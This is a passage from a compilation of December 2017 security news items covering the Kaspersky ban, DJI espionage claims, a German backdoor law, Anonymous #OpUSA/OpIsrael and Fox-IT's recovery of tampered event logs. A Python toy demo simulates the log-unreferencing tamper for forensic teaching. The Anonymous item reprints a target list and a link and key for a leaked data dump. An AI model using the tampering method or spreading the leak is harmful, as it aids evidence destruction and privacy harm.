The event's Silicon Valley spirit and prospects of hard cash are both intended to lure sharp young minds towards working for the nation's defence, he added.

"You can pay someone £30,000 ($40,000, 34,000 euros) a year to go and work at GCHQ and they can basically double that by going to industry. It's hard to get them in and retain them."

- 'Keen to attract young talent' -

"We also know GCHQ is very, very keen to attract young talent," said Anthony Glees, director of the Buckingham University Centre for Security and Intelligence Studies.

"Some of the most successful hackers have been 16- and 17-year-old lads working out of their bedrooms."

However, the necessity of information sharing with private citizens creates potential security "pitfalls", he said, with the leaks by private contractor Edward Snowden while working for the NSA -- GCHQ's US equivalent -- serving as a warning.

GCHQ conduct thorough background checks, but this is "an extremely expensive process", said Glees.

The government must therefore walk a fine line in judging what information to share.

"Exchanging information is always hazardous... but it is necessary," said Glees.

But some things will remain stamped "Top secret", including the location where the entrepreneurs do their work with Britain's cyber-spies.

"It's a physical place, but you can't tell anyone where it is," said the NCSC's Ensor.


Trump signed a bill prohibiting the use of Kaspersky Lab product and services
14.12.2017 securityaffairs BigBrothers

The US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.
Section 1634 of the bill prohibits the use of security software and services provided by the security giant Kaspersky Lab; the ban takes effect on October 1, 2018.

Below are the details of the ban included in Section 1634 of the National Defense Authorization Act for Fiscal Year 2018.

“SEC. 1634. Prohibition on use of products and services developed or provided by Kaspersky Lab.

(a) Prohibition.—No department, agency, organization, or other element of the Federal Government may use, whether directly or through work with or on behalf of another department, agency, organization, or element of the Federal Government, any hardware, software, or services developed or provided, in whole or in part, by—

(1) Kaspersky Lab (or any successor entity);
(2) any entity that controls, is controlled by, or is under common control with Kaspersky Lab; or
(3) any entity of which Kaspersky Lab has majority ownership.

(b) Effective date.—The prohibition in subsection (a) shall take effect on October 1, 2018.”

Senator Jeanne Shaheen welcomed the news, asserting that the US Government has gathered all the evidence needed to justify the decision.

“The case against Kaspersky is well-documented and deeply concerning. This law is long overdue, and I appreciate the urgency of my bipartisan colleagues on the Senate Armed Services Committee to remove this threat from government systems.” commented Shaheen.

Sen. Shaheen is the author of a letter recently sent to the Trump administration asking that information on Kaspersky Lab be declassified “to raise public awareness regarding the serious threat that the Moscow-based software company poses to the United States’ national security.”

Sen. Jeanne Shaheen (@SenatorShaheen), Dec 12, 2017:

“The defense bill also provides funding for a nationwide health study on the impact of contaminants in drinking water. Seacoast families deserve peace of mind and I’m glad that we can finally move forward with this study. http://bit.ly/2l3833k”

“Also included is my amendment to ban the use of Kaspersky Lab software on all government computers. The case against Kaspersky is well-documented & deeply concerning, & I’ll continue to advocate for measures to strengthen our nation’s cybersecurity. http://bit.ly/2BFJ6SG”

Kaspersky Lab issued the following statement about Section 1634.

“Kaspersky Lab continues to have serious concerns about Section 1634 of the National Defense Authorization Act due to its geographic-specific approach to cybersecurity, singling out Kaspersky Lab, which we maintain, does little to mitigate information security risks affecting government networks.” reads the statement issued by Kaspersky.

“Nevertheless, Kaspersky Lab is assessing its options, while continuing to protect its customers from cyber threats, and collaborating globally with the IT security community to fight cybercrime.”


In September, the U.S. DHS ordered federal agencies to stop using Kaspersky software and services.

The ban was the response to the concerns about possible ties between Kaspersky and Russian intelligence agencies.

According to The Washington Post, which first reported the news, the order applies to all civilian government networks, but not the military ones.

Recently the UK’s National Cyber Security Center (NCSC) has also issued a warning regarding the use of Kaspersky software and services by government agencies.

The CEO of the UK National Cyber Security Centre (NCSC), Ciaran Martin, wrote to permanent secretaries regarding the issue of supply chain risk in cloud-based products, including anti-virus (AV) software.

The NCSC is a branch of the UK Government Communications Headquarters (GCHQ), the UK intelligence and security agency.

The letter warns against software made in hostile states, specifically Russia: as the Prime Minister’s Guildhall speech set out, the Government in Moscow is acting against the UK’s national interest in cyberspace.

Kaspersky has repeatedly denied the accusations and it announced the launch of a transparency initiative that involves giving partners access to the source code of its solutions.


Trump Signs Bill Banning Kaspersky Products
13.12.2017 securityweek BigBrothers
U.S. President Donald Trump on Tuesday signed a bill that prohibits the use of Kaspersky Lab products and services in federal agencies.

The National Defense Authorization Act for FY2018 (H.R. 2810) focuses on Department of Defense and Department of Energy programs, authorizes recruitment and retention bonuses for the Armed Forces, and makes changes to national security and foreign affairs programs.

Section 1634 of the bill bans the use of products and services provided by Russia-based cybersecurity firm Kaspersky Lab. The prohibition will go into effect on October 1, 2018.

“No department, agency, organization, or other element of the Federal Government may use, whether directly or through work with or on behalf of another department, agency, organization, or element of the Federal Government, any hardware, software, or services developed or provided, in whole or in part, by (1) Kaspersky Lab (or any successor entity); (2) any entity that controls, is controlled by, or is under common control with Kaspersky Lab; or (3) any entity of which Kaspersky Lab has majority ownership,” the bill reads.

Senator Jeanne Shaheen, who has spearheaded the campaign against Kaspersky, stated, “The case against Kaspersky is well-documented and deeply concerning. This law is long overdue, and I appreciate the urgency of my bipartisan colleagues on the Senate Armed Services Committee to remove this threat from government systems.”

Sen. Shaheen recently sent a letter to the Trump administration asking that information on Kaspersky Lab be declassified “to raise public awareness regarding the serious threat that the Moscow-based software company poses to the United States’ national security.”

The U.S. Department of Homeland Security (DHS) ordered federal agencies to stop using Kaspersky products back in September, and the bill signed on Tuesday reinforces that order. However, the government has yet to provide any evidence of wrongdoing and even Sen. Shaheen’s statements appear to be largely based on various media reports citing anonymous officials.

One of the most recent media reports involving Kaspersky claimed Russian spies exploited the company’s products to steal sensitive files from an NSA contractor’s computer. The contractor in question has been charged and the cybersecurity firm has shared its side of the story.

The UK's National Cyber Security Center (NCSC) has also issued a warning regarding the use of Kaspersky products by government agencies. While the ban is less explicit compared to the US, it is expected to have a similar effect.

Kaspersky has repeatedly denied the accusations and it recently announced the launch of a transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.

UPDATE. Kaspersky Lab has provided the following statement:

“Kaspersky Lab continues to have serious concerns about Section 1634 of the National Defense Authorization Act due to its geographic-specific approach to cybersecurity, singling out Kaspersky Lab, which we maintain, does little to mitigate information security risks affecting government networks. Nevertheless, Kaspersky Lab is assessing its options, while continuing to protect its customers from cyber threats, and collaborating globally with the IT security community to fight cybercrime.”


Singapore Ministry of Defence Announces Bug Bounty Program
13.12.2017 securityweek BigBrothers
Singapore’s Ministry of Defence (MINDEF) has invited roughly 300 white hat hackers from around the world to take part in a two-week bug bounty program targeting eight of its Internet-facing systems.

The MINDEF Bug Bounty Programme, scheduled to run between January 15 and February 4, 2018, is powered by the HackerOne platform.

The initiative covers the Defence Ministry’s public website, its I-Net and email services, the Central Manpower Base site, the Defence Science and Technology Agency site, and the NS, eHealth, LearNet 2 and myOASIS portals. Some of the targeted systems belong to the Singapore Armed Forces (SAF).

Rewards will range between S$150 (USD110) and roughly S$20,000 (USD15,000), and the total amount paid out will depend on the number and quality of bug reports. However, the cost of running the bug bounty program is expected to be less than what a commercial cybersecurity company would charge for an assessment, the Ministry said.

“Singapore is constantly exposed to the increasing risk of cyberattacks, and MINDEF is an attractive target for malicious cyber activity,” MINDEF said. “It is not possible to fully secure modern day computer software systems, and new vulnerabilities are discovered every day. As hackers with malicious intent find new methods to breach networks, MINDEF must constantly evolve and improve its defences against cyber threats.”

The announcement comes just months after the Ministry admitted that hackers had managed to breach a military system that stored non-classified data and personal information on servicemen and employees.

Singapore announced last year its intention to block Internet access on government computers for security reasons, but officials later clarified that the goal was to segregate sensitive systems from other online activities.

Singapore is the home city for SecurityWeek’s 2018 Singapore ICS Cyber Security Conference, an event dedicated to serving critical infrastructure and industrial internet stakeholders in the APAC region. The conference will take place April 24-26, 2018 at the Fairmont Singapore.


Event Logs Manipulated With NSA Hacking Tool Recoverable
12.12.2017 securityweek BigBrothers
Researchers at security firm Fox-IT have developed a tool that allows investigators to detect the use of specific NSA-linked malware and recover event log data it may have deleted from a machine.

The group calling itself Shadow Brokers has published several tools and exploits stolen from the Equation Group, cyberspies believed to be working for the U.S. National Security Agency (NSA). One of the tools leaked by the Shadow Brokers in April is DanderSpritz, a post-exploitation framework that allows hackers to harvest data, bypass and disable security systems, and move laterally within a compromised network.

An interesting DanderSpritz plugin is EventLogEdit, which is designed for manipulating Windows Event Log files to help attackers cover their tracks. While hacker tools that modify event logs are not unheard of, EventLogEdit is more sophisticated compared to others as it allows removal of individual entries from the Security, Application and System logs without leaving any obvious clues that the files had been edited.

“While we understand that event logs can be cleared and event logging stopped, surgically editing event logs is usually considered to be a very advanced capability (if possible at all),” Jake Williams, founder of Rendition Infosec and an expert in Shadow Broker leaks, said after news of the tool emerged. “Knowing that some attackers apparently have the ability to edit event logs can be a game changer for an investigation.”

Since the tool has been made public by the Shadow Brokers, it gives less sophisticated actors the opportunity to cover their tracks and hamper forensic investigations.

Fortunately, Fox-IT researchers have found a way to determine if EventLogEdit has been used on a system, and even recover the event log entries that it removed.

“When eventlogedit is used, the to-be-removed event record itself isn’t edited or removed at all: the record is only unreferenced. This is achieved by manipulation of the record header of the preceding record. Eventlogedit adds the size of the to-be-removed-record to the size of the previous record, thereby merging the two records. The removed record including its record header is now simply seen as excess data of the preceding record,” researchers explained. “You might think that an event viewer would show this excess or garbage data, but no. Apparently, all tested viewers parse the record binXml message data until the first end-tag and then move on to the next record.”

Experts pointed out that the removed records should be seen by organizations that send logs on the fly to a central server, but sophisticated attackers are likely to hijack that machine as well in an effort to hide their activities.

However, since the EventLogEdit tool leaves the removed record and record header in their original state, full recovery of the data is possible.

Fox-IT has released an open source Python script that identifies and exports removed event log records, allowing organizations to check whether they have been targeted by the NSA or any other threat actor that may be leveraging EventLogEdit. Users who don’t want to bother with the Python code themselves can download a version of the tool provided as a Windows executable.
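The mechanism Fox-IT describes, worked through on a constructed toy log as an added example (not Fox-IT's script or code from the article): the record layout is a simplified format loosely modelled on an EVTX record header (signature, total size, record id, payload), so it is not a real EVTX parser; the point is that folding a record's size into its predecessor hides it from a viewer that jumps by the size field, while a forensic walk that scans the rest of each record's declared span for further headers gets it back.

```python
"""Toy demonstration of the EventLogEdit technique Fox-IT describes and of the
recovery it permits. The record layout (signature, size, record id, payload)
is a simplified constructed format loosely modelled on EVTX record headers,
not a real EVTX parser; use Fox-IT's script on real files. Added example, not
code from Fox-IT or the article."""
import struct

MAGIC = b"**\x00\x00"          # record signature
HDR = struct.Struct("<4sIQ")   # signature, total record size, record id


def build_log(messages):
    """Constructed sample log: consecutive record ids, NUL-terminated payloads
    (standing in for the BinXML a viewer parses up to its end tag)."""
    blob = bytearray()
    for rec_id, msg in enumerate(messages, start=1):
        payload = msg.encode() + b"\x00"
        blob += HDR.pack(MAGIC, HDR.size + len(payload), rec_id) + payload
    return bytes(blob)


def _read_header(blob, off):
    """Return (size, record id) if a plausible record header starts at off."""
    if off + HDR.size > len(blob):
        return None
    magic, size, rec_id = HDR.unpack_from(blob, off)
    if magic != MAGIC or size < HDR.size + 1 or off + size > len(blob):
        return None
    return size, rec_id


def _payload_end(blob, off, size):
    """Offset just past the payload terminator of the record at off."""
    return blob.index(b"\x00", off + HDR.size, off + size) + 1


def _payload_text(blob, off, size):
    return blob[off + HDR.size:_payload_end(blob, off, size) - 1].decode()


def parse_visible(blob):
    """What a viewer shows: parse each payload to its terminator, then jump by
    the header's size field. Excess bytes inside that span are never shown."""
    out, off = [], 0
    while (hdr := _read_header(blob, off)) is not None:
        size, rec_id = hdr
        out.append((rec_id, _payload_text(blob, off, size)))
        off += size
    return out


def unreference_record(blob, target_id):
    """Simulate the manipulation described above on the toy log: add the
    target's size to the preceding record's size field. The target's bytes,
    header included, stay in place but are no longer referenced."""
    blob, off, prev = bytearray(blob), 0, None
    while (hdr := _read_header(blob, off)) is not None:
        size, rec_id = hdr
        if rec_id == target_id and prev is not None:
            prev_size = struct.unpack_from("<I", blob, prev + 4)[0]
            struct.pack_into("<I", blob, prev + 4, prev_size + size)
            return bytes(blob)
        prev, off = off, off + size
    raise ValueError("target id not found, or it is the first record")


def recover_all(blob):
    """Forensic walk: after each visible payload, scan the rest of the record's
    declared span for further record headers and surface what they hide.
    Returns (record id, message, was_hidden) tuples."""
    out, off = [], 0
    while (hdr := _read_header(blob, off)) is not None:
        size, rec_id = hdr
        out.append((rec_id, _payload_text(blob, off, size), False))
        cursor, end = _payload_end(blob, off, size), off + size
        while cursor < end:
            pos = blob.find(MAGIC, cursor, end)
            if pos < 0:
                break
            inner = _read_header(blob, pos)
            if inner is None or pos + inner[0] > end:
                cursor = pos + 1          # signature without a valid header: keep scanning
                continue
            out.append((inner[1], _payload_text(blob, pos, inner[0]), True))
            cursor = pos + inner[0]
        off = end
    return out


def missing_ids(visible):
    """Cheap triage signal: visible record ids should be contiguous; gaps
    between consecutive visible records point at unreferenced ones."""
    ids = [rec_id for rec_id, _ in visible]
    return {i for a, b in zip(ids, ids[1:]) for i in range(a + 1, b)}


if __name__ == "__main__":
    log = build_log(["logon ok", "suspicious tool executed", "logoff"])
    tampered = unreference_record(log, 2)
    print("viewer sees:", parse_visible(tampered))
    print("id gaps:", missing_ids(parse_visible(tampered)))
    print("recovered:", recover_all(tampered))
```

Note that the tampered log has exactly the same length as the original, which is why clearing or size-based integrity checks do not catch this; only the record-id gap and the header scan do.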


#OpUSA – OpIsrael – Anonymous hit Israel and threatens cyberattack on US Govt
9.12.2017 securityaffairs BigBrothers

#OpUSA – OpIsrael – The hacker collective Anonymous threatens cyber attacks on the US Government and has launched an offensive against Israeli targets.
In the last hours, the hacktivists leaked online the names, emails, and passwords of Israeli public employees and shared a list of US government sites to target, calling for action against them.

Anonymous leaked data belonging to only a handful of the sites; the leak is the collective’s retaliation against the US Government for its policies in the Middle East.

The Anonymous operation aims to protect Palestine and to protest Donald Trump’s decision to recognize Jerusalem as the capital of Israel.

Below is the message published on the blog of the website cyberguerilla.com:

“Anonymous OpUSA – OpIsrael: Israeli Gov’t hacked and dumped. Download link!

This Hack is part of the Operation US + Israel. #OpUSA – OpIsrael

The end of 2017 #Anonymous

Operation: https://pastebin.com/tgbkCQ61

Israel Gov’t hacked and dumped.

Download dump: https://mega.nz/#!ZWByDAbT

Decryption Key: !-Yvx4-wlzWEV5gagusHKcDF4eYeABfJxgDh_foO-D20

“Government of Israel and United States, our patience is exhausted!
No more words! Now only acts.
Anonymous can’t be silent when we see your actions.
Now it’s Anonymous time.”
We Are Anonymous,
We Are Legion,
We do not forgive,
We do not forget.
Government of USA and Israel,
Expect us.”
Anonymous is calling for action against the websites included in its United States and Israel Government target list, inviting its members to hit these sites in any way (i.e. data dumps, government breaches, defacing, DDoSing):

https://www.usa.gov/ = USA
https://www.gov.il/ = Israel
https://www.state.gov/ = USA
http://www.president.gov.il/ = Israel
https://www.whitehouse.gov/ = USA
http://itrade.gov.il/ = Israel
https://www.ssa.gov/ = USA
http://www.investinisrael.gov.il/ = Israel
https://www.data.gov/ = USA
http://www.antitrust.gov.il/ = Israel
https://www.irs.gov/ = USA
http://www.boi.org.il/en/ = Israel
https://www.federalreserve.gov/ = USA
http://www.space.gov.il/ = Israel
https://www.shabak.gov.il/ = Israel
The hackers aim to spread #OpUSA and #OpIsrael by defacing .us and .il domains, and are using the hashtags #OpUSA, #OpIsrael and #FreedomInWorld to make it easy for sympathizers to find all the Anonymous posts on social media.


Anonymous shared the code for the main deface page for OpUSA – OpIsrael here: https://ghostbin.com/paste/o3o88


The dump leaked by Anonymous is circulating online; it is a huge trove of data apparently containing the names and email addresses of government employees and alleged Mossad agents.

More news about the campaign is expected to be published on the Cyberguerrilla website.


The Indian Intelligence warns China is spying through 42 mobile apps
8.12.2017 securityaffairs BigBrothers

The Indian Intelligence warns that China is spying on its troops through 42 mobile apps; for this reason, the Intelligence Bureau asked soldiers to delete them.
The Indian Intelligence Bureau (IB) has warned that Chinese cyber spies are collecting confidential information about Indian security installations through popular Chinese mobile phone apps and devices.

The Intelligence Bureau issued an advisory to the troops posted at the international border.

Many Indian cybersecurity experts have raised concerns about the possible espionage attempts by the Chinese military intelligence agencies.

“According to reports, the advisory issued by the DIG (Intelligence) has directed the troops posted along the Line of Actual Control (LAC) to either delete a number of mobile applications from their smartphones or reformat the devices altogether to guard against online espionage attempts from across the border.” reported the website Zeenews.india.com.

The advisory includes a list of about 42 popular Chinese mobile apps, including WeChat, Truecaller, Weibo, UC Browser and UC News, which, according to Indian intelligence, pose a serious threat to the security of the state.

Indian intelligence suspects that these apps transmit sensitive personal data to the Chinese Government.

The fresh advisory was issued while the troops from both sides continue to maintain high alertness levels along the LAC.

The intelligence agencies regularly warn the armed forces against using Chinese apps, to prevent the leakage of confidential information to a hostile state like China.

The IAF, for example, advised its staff and their families to avoid using Chinese Xiaomi smartphones.

“The Army, as well as the central armed police forces like the Indo-Tibetan Border Police, are deployed along the 4,057km LAC, which stretches from Ladakh to Arunachal Pradesh.” continues the Zee Media Bureau.

“The IAF, for instance, had earlier asked all its officers and airmen as well as their families to avoid using Chinese Xiaomi smartphones and notebooks on the ground that they could transfer user data to remote servers located in China.”

The warning from the IB covers Chinese mobile apps for both Android and iOS.


Senate Confirms New US Homeland Security Chief
6.12.2017 securityweek BigBrothers   
The US Senate confirmed White House deputy chief of staff Kirstjen Nielsen as Secretary of Homeland Security on Tuesday, putting her in charge of implementing the Trump administration's immigration crackdown.

Nielsen is close to White House Chief of Staff John Kelly, who was President Donald Trump's first secretary at the Department of Homeland Security before he was brought in to discipline Trump's chaotic office at the end of July.

Nielsen, 45, is a lawyer and veteran of the national security sector. She served in the transportation security unit of DHS during the George W. Bush administration, and was also Bush's homeland security advisor in the White House.


Later she ran her own security advisory firm, Sunesis Consulting.

Known for expertise in cyber issues, she was named Kelly's chief of staff when he took over DHS at the beginning of the Trump administration, and then followed him to the White House.

Described as tough and no-nonsense, she nevertheless lacks the experience of running a massive organization like the 240,000-strong DHS.

The agency oversees a wide range of security issues, from immigration, to cyber, terror threats and disaster relief.

The Senate approved her nomination 62-37.

Her confirmation came on a day when DHS claimed substantial success in slowing illegal immigration across the southern border and in arresting and deporting criminal aliens.

DHS said arrests of illegal immigrants were up 40 percent in the first nine months of the Trump administration, while border crossings plummeted based on tougher enforcement.

Trump has also ordered DHS to build a wall along the southern border.

But both Kelly and Nielsen have said that a wall on the entire 2,000 mile (3,200 kilometer) frontier with Mexico would be inappropriate, and that other measures, including electronic monitoring, would be required as well.


Is Your DJI Drone a Chinese Spy? Leaked DHS Memo Suggests
5.12.2017 thehackernews  BigBrothers

The United States Department of Homeland Security (DHS) has recently accused Da-Jiang Innovations (DJI), one of the largest drone manufacturers, of sending sensitive information about U.S. infrastructure to China through its commercial drones and software.
A copy of a memo from the Los Angeles office of the Immigration and Customs Enforcement bureau (ICE) has recently begun circulating online, alleging "with moderate confidence" that DJI drones may be sending US critical infrastructure and law enforcement data back to China.
However, the bureau assessed "with high confidence" that this critical data collected by DJI systems could then be used by the Chinese government to conduct physical or cyber attacks against U.S. critical infrastructure and its population.
The memo goes on to specify the targets the Chinese Government has been attempting to spy on, which includes rail systems, water systems, hazardous material storage facilities, and construction of highways, bridges, and rails.
The memo, marked as "unclassified/law enforcement sensitive," was dated back to August this year, but was recently published by the Public Intelligence project.
In its memo, ICE cited what it called a reliable source in the drone industry "with first and secondhand access," but did not identify it, specifying that the concern is over DJI drones used by companies and institutions, not the ones flown by hobbyists in the U.S. and elsewhere.
According to ICE, the DJI drones operate on two Android smartphone apps—DJI GO and Sky Pixels—that automatically tag GPS imagery and locations, access users' phone data, and register facial recognition data even when the system is off.
Besides this, ICE says the apps also capture users' identification and personal information, like their full names, email addresses, phone numbers, computer credentials, images, and videos.
"Much of the information collected includes proprietary and sensitive critical infrastructure data, such as detailed imagery of power control panels, security measures for critical infrastructure sites, or materials used in bridge construction," the ICE memo reads.
Citing an unnamed source, ICE alleged that DJI then automatically uploads this collected information to its cloud storage systems located in China, Taiwan, and Hong Kong, which the Chinese government most likely has access to.
Drone Maker Denies Sending Data to Chinese Government
Of course, the drone-maker has denied the allegations, saying that the memo from the US government office was based on "clearly false and misleading claims."
"The allegations in the bulletin are so profoundly wrong as a factual matter that ICE should consider withdrawing it, or at least correcting its unsupportable assertions," DJI said in a statement, cited by The New York Times.
According to a DJI spokesman, users have complete control over how much data they share with the Chinese drone maker, and the automatic function offered by the DJI apps to store user flight logs can also be turned off.
Moreover, DJI has recently added a new feature that allows pilots to cut off all outside internet connections while the drone is flying.
According to drone research firm Skylogic Research, DJI dominates the overall drone market with an almost two-thirds share in the United States and Canada. Not just hobbyists, but DJI drones are also used by commercial customers like contractors, police and realtors.
The accusation DJI is facing is similar to the one faced by Kaspersky Lab, accused of spying on its users and sending the stolen data back to the Russian government.
The DHS has also banned Kaspersky antivirus products in US government agencies over Russian spying fears without actually having any substantial evidence. The company has always denied any direct involvement with the Russian spies in the alleged incident.


German Government prepares Law for backdoors and hacking back
5.12.2017 securityaffairs  BigBrothers

The German Government is preparing a law that would force hardware vendors to include a backdoor in their products and would allow its agencies to hack back.
The German Government is preparing a law that will force hardware vendors to include a backdoor in their products. The law aims to allow law enforcement agencies to use backdoors to gather information during their investigations.

The law would target devices in any industry, including telecommunications, automotive and IoT products.

According to local news outlet RedaktionsNetzwerk Deutschland (RND), German Officials are expected to submit their proposal for debate this week.

“The acting Federal Minister of the Interior Thomas de Maizière (CDU) wants to oblige the industry to open a digital gateway for German security authorities to spy on private cars, computers and smart TVs.” states the news outlet.

“The proposal is headed “Need for action on the legal obligation of third parties for measures of covert information gathering according to §§ 100c and 100f StPO”. De Maizière wants to drastically expand the so-called eavesdropping attack by “using technical means against individuals”. Above all, large corporations and producers of digital security systems should be required to provide information and notification.”

The proposal is strongly supported by de Maizière, who cites the difficulties investigations have faced in the past, especially when fighting terrorist organizations.


The Interior Minister explained that modern technology is able to alert suspects to activity conducted against them by law enforcement agencies.

The Minister cited the case of smart cars that alert their owner as soon as the vehicle is shaken or any other anomalous activity is detected, for instance when police officers access it.

A backdoor would allow investigators to operate while suppressing any warning that would otherwise be sent to the suspect.

De Maizière stressed that companies have a “legal obligation” to introduce backdoors for the use of law enforcement agencies.

The Minister aims to oblige hardware manufacturers to disclose their “programming protocols” for analysis by government experts, which would in effect force companies to disclose details of how their products encrypt communications.

“Accordingly, eavesdropping would in future be possible wherever devices are connected to the Internet. The industry should give the state exclusive access rights to devices such as private tablets and computers, smart TVs or digitized kitchen appliances. A precondition for all measures of the extended wiretapping attack, however, would remain a judicial decision.” continues the news outlet.

One of the most disturbing aspects of the new law is that it would give German officials the power to hack back any remote computer suspected of being involved in attacks against the country’s infrastructure.

Similar powers were discussed by French Defense Minister Le Drian in January 2017 and by US authorities; in both cases the officials were referring to cyber attacks attributed to Russian intelligence.

The Minister also wants the authority to “shut down private computers in the event of a crisis,” as is done in botnet takedowns.

“De Maizière also wants an authorization for the security authorities to shut down private computers in the event of a crisis. A “botnet takedown specialist concept” will allow security authorities to use private data to alert end users in good time if hackers want to misuse their computers for criminal purposes. In the event that online providers refuse to cooperate, far-reaching penalties are provided for.” continues the RedaktionsNetzwerk Deutschland.

Privacy advocates believe the German law could open the door to mass surveillance programs, giving government officials sweeping powers to snoop on everyone’s online communications.

The German authorities rejected such accusations and stressed that any access to data gathered under these powers would be allowed only after law enforcement has obtained a court order.

The reality is that a backdoor dramatically reduces the overall security of any system: once it exists, it cannot be restricted to the intended party, and it can be discovered and used by malicious actors such as a foreign government or a criminal syndicate, with unpredictable consequences.


DJI drones may be sending data about U.S. critical infrastructure and law enforcement to China
5.12.2017 securityaffairs  BigBrothers

The US DHS has accused the Chinese Da-Jiang Innovations (DJI) of cyber espionage on U.S. critical infrastructure and law enforcement.
The US Department of Homeland Security (DHS) has recently accused the Chinese Da-Jiang Innovations (DJI), one of the largest drone manufacturers, of sending sensitive information about U.S. critical infrastructure and law enforcement to China.

A copy of a memo from the Los Angeles office of the Immigration and Customs Enforcement bureau (ICE) was published recently by the Public Intelligence project. The copy is marked “unclassified / law enforcement sensitive” and alleges “with moderate confidence” that DJI drones are being used by the Chinese Government as spying tools.

The authors of the memo provide several examples of law enforcement and critical infrastructure organizations using the DJI drones.

The situation is worrisome because data gathered by DJI could be used by the Chinese government to conduct physical or cyber attacks against US critical infrastructure (i.e. rail systems, water systems, hazardous material storage facilities, and the construction of highways, bridges, and rails).


The concern relates only to DJI drones used by companies and government organizations, not to the unmanned vehicles used by hobbyists.

“It is based on information derived from open source reporting and a reliable source within the unmanned aerial systems (UAS) industry with first and secondhand access. The date of information is 9 August 2017.” reads the intelligence bulletin.
“(U//LES) SIP Los Angeles assesses with moderate confidence that Chinese-based company DJI Science and Technology is providing U.S. critical infrastructure and law enforcement data to the Chinese government. SIP Los Angeles further assesses with high confidence the company is selectively targeting government and privately owned entities within these sectors to expand its ability to collect and exploit sensitive U.S. data.”

According to ICE, DJI drones are operated through two Android smartphone applications, DJI GO and Sky Pixels, which automatically tag imagery with GPS locations, register facial recognition data even when the system is off, and access data on the smartphone.

ICE says the mobile apps also gather users’ identification and personal information, including full names, email addresses, phone numbers, computer credentials, images, and videos.

“Additionally, the applications capture user identification, e-mail addresses, full names, phone numbers, images, videos, and computer credentials. Much of the information collected includes proprietary and sensitive critical infrastructure data, such as detailed imagery of power control panels, security measures for critical infrastructure sites, or materials used in bridge construction.” the ICE memo reads.

“According to the source of information (SOI), DJI automatically uploads this information into cloud storage systems located in Taiwan, China, and Hong Kong, to which the Chinese government most likely has access. SIP Los Angeles assesses with high confidence a foreign government with access to this information could easily coordinate physical or cyber attacks against critical sites.”

The Chinese drone manufacturer denied the allegations; in a statement, the company said the report was “based on clearly false and misleading claims.”

“The allegations in the bulletin are so profoundly wrong as a factual matter that ICE should consider withdrawing it, or at least correcting its unsupportable assertions,” DJI said in a statement, cited by The New York Times.

According to a DJI spokesman, users can configure their drones to control how much data they share with the manufacturer.

“DJI does strive to comply with local laws and regulations in each country where its drones operate and to facilitate compliance by our customers. To the extent that there are location-specific rules and policies within China, we ensure that our systems comply with these rules, including the need to register or include no-fly zones on board,” DJI stated.

“In compliance with the Chinese regulation, DJI utilizes the user’s IP address, GPS location, and MCC ID to determine if a drone is being operated in China. If so, DJI provides the customer with the features necessary to comply with Chinese regulations and policies. Otherwise, DJI provides no information about or data collected by the drone to the Chinese government,”

Moreover, DJI has recently implemented a feature that allows pilots to cut off all outside internet connections while the drone is flying.


UK Members of Parliament Share Passwords with Staff
5.12.2017 securityweek BigBrothers
UK member of parliament (MP) Nadine Dorries has declared on Twitter that she shares the password to her work computer with staff 'including interns'.

The immediate purpose of the statement was to lend political support to under-fire First Secretary of State Damian Green. Green was accused by a former Metropolitan Police assistant commissioner of accessing porn on his work computer following a 2008 police raid investigating Home Office leaks. Dorries' tweet includes the statement, "For the officer on @BBCNews just now to claim that the computer on Greens desk was accessed and therefore it was Green is utterly preposterous!!"

But in supporting her colleague, she might have stirred a bigger scandal than that concerning Green: MPs' attitude towards passwords. Several other MPs have agreed with and supported Dorries' position.

Dorries' defense of Green is common in both politics and international cyber relations: plausible deniability through the difficulty of attribution. If multiple people could have committed an act, you cannot easily prove which one is the guilty party. And if multiple people have the password, it is hard to prove who did what with the computer.

In security, however, the fourth criterion after confidentiality, integrity and availability (CIA) is often defined as accountability. It is clear that any MP that shares his or her password is automatically failing to maintain, or specifically obfuscating, accountability. In reality, they are also guilty of ignoring official policy. The House of Commons Staff Handbook (section 5.8) says, "You MUST NOT... share your password."

The UK's National Cyber Security Center (NCSC) Password Guidance, updated in August 2016, also states, "You should never allow password sharing between users. Sharing accounts, or even occasional use by anyone other than the account holder, negates the benefit of authenticating a specific user. In particular, the ability to audit and monitor a specific user's actions is lost."

However, the sharing of MPs' passwords may go beyond simply ignoring advice and/or policy. Although sharing passwords is not in itself a breach of the UK's Data Protection Act, it could lead to a breach. The UK's data protection regulator, the ICO, itself tweeted, "We're aware of reports that MPs share logins and passwords and are making enquiries of the relevant parliamentary authorities. We would remind MPs and others of their obligations under the Data Protection Act to keep personal data secure."

It is questionable whether giving interns access to the potentially sensitive personal information of constituents is within the spirit, if not the letter, of the current law. It is also concerning that Britain's lawmakers should have such a lax attitude towards security at a time when its intelligence agencies are increasingly warning about Russia targeting the UK government.

Security researcher Troy Hunt suggests, without condoning, that this is an example of users bypassing policy in order to work more efficiently. "Her approach to password sharing may simply be evidence of humans working around technology constraints." This is common in all organizations -- and is generally countered by security awareness training supported by technological controls.

The need to share data among several different people is not uncommon -- and there are numerous technology solutions that could be employed. These include delegated access, shared access to collaboration tools (where the MP's staff would have password-controlled access to the documents rather than to the MP's computer), or even Microsoft's SharePoint.

The most worrying aspect of MPs and their password sharing is their common belief that there is nothing wrong with it. This in turn suggests that MPs do not receive adequate security awareness training and/or that parliament's IT department isn't offering sufficient options to make sharing unnecessary -- or controls to make it impossible. In most private enterprises, sharing passwords would be considered a disciplinary offense.


UK National Cyber Security Centre (NCSC)’s letter warns against software made in hostile states, specifically Russia
4.12.2017 securityaffairs  BigBrothers

The UK National Cyber Security Centre (NCSC) warns of supply chain risk in cloud-based products, including antivirus (AV) software developed by Russia.
We have long debated the ban on Russian security software in US Government offices; now part of the UK intelligence community is adopting a similar strategy.

Last week the CEO of the UK National Cyber Security Centre (NCSC), Ciaran Martin, wrote to permanent secretaries regarding the issue of supply chain risk in cloud-based products, including anti-virus (AV) software.

The NCSC is a branch of the UK Government Communications Headquarters (GCHQ), the UK intelligence and security agency.

The letter warns against software made in hostile states, specifically Russia: as the Prime Minister’s Guildhall speech set out, the government in Moscow is acting against the UK’s national interest in cyberspace.

The letter provides advice to government departments, but it is not a ban on specific products.

The letter highlights the intrusive nature of antivirus software, which is necessary for it to detect malicious code, and stresses that it is important to remain vigilant to the risk that an AV product developed by a hostile actor could perform a wide range of malicious activities.

